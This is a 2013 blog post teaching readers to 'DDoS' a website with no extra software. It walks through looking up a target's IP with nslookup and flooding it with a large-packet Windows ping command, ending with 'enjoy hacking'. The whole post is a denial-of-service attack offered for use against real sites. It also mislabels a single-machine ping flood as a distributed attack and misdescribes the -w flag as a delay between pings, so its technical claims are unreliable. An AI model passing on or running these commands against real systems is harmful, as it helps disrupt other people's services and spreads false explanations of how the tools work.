Thursday, June 13, 2013

DDOSing without any software.





DDOSing without any software :D

First open your CMD from run ( window + r )



Now the important thing what we want is the ip address of the site that we are going to attack.

To get the ip of any site just type nslookup in cmd followed by the address of website

for eg: if you want the ip address of google just type

nslookup http://www.google.com/  
or
ping www.google.com

these command will give you the ip address

Ok , now you got the ip address of the site you are going to attack,

then type the following command in your CMD and hit enter

ping website-IP -l 65500 -n 10000000 -w 0.00001

-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desiredvalue u want to attempt attack. 


website-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack. 


for eg: if the ip address is 112.158.10.2

just type

ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001 

And thats it you are done . Dont Change or Remove -l, -n and -w in this command.. otherwise it wont work

enjoy hacking !!! :D

0 comments:

Post a Comment